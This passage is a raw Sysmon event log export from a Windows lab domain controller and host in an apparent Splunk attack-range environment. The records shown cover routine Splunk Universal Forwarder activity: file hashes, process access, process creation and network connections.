Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3511F3AF3207DC5194D4F4120B8426E,SHA256=492DD59A30B55D57306D6E7594FBC290897F2E6ECBCDF75F5E6D027615C68AA3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286385Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:13.691{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53330-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286384Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:16.201{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42771D341F024B22BD75D33C185A2657,SHA256=7219A3ED20B1ACBC8661326F38E62C118CE41B0E76D19BF3187FBB3561935EF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286386Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:17.232{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41B7D5F1394290F9B5DE5929DEC6950C,SHA256=912B6F5FA320EDFAF54589F2B495ACCE5C371CE397BF6000F4BD6107665BE365,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286387Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:18.247{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C880CBFE6EB3C7ABE34A36A539242CA,SHA256=AAE18F1962514BE98B93531DBE6B441041A81933EBF3EE47F3CF76FEC61F24AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215342Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:18.022{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=119F12A4717AC31E1811376ABB872C1D,SHA256=EDD90571EC8CDED9654643A1251C1374DE3FB6217C6C6FA581B67C5D0E5AEAEE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.966{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0FC7-6216-D704-000000003802}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286402Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286401Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286400Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.966{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0FC7-6216-D704-000000003802}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286399Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.966{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0FC7-6216-D704-000000003802}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286398Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.967{C8EA50B7-0FC7-6216-D704-000000003802}1104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000286397Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.747{C8EA50B7-0FC7-6216-D604-000000003802}5600300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.466{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0FC7-6216-D604-000000003802}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286395Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.466{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286394Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.466{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286393Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.466{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286392Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.466{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0FC7-6216-D604-000000003802}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286391Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.466{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286390Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.466{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0FC7-6216-D604-000000003802}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286389Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.467{C8EA50B7-0FC7-6216-D604-000000003802}5600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286388Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:19.326{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A66007D60103135399C929C70E513AA5,SHA256=386B3C201E3A84ECC596F305D8D822E2BA5E8F6D10226CDF1918F2123CA5F420,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215344Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:17.602{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51251-false10.0.1.12-8000- 23542300x8000000000000000215343Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:43:19.022{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD107C9A7853F0E599948D9833919FF9,SHA256=4BC4E2ADDED0B5003CCC54F09D35084B02AC9F54DBEF53176DF3CB4ED7CE140B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.966{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0FC8-6216-D904-000000003802}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.966{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0FC8-6216-D904-000000003802}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.966{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:43:20.966{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0FC8-6216-D904-000000003802}5920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 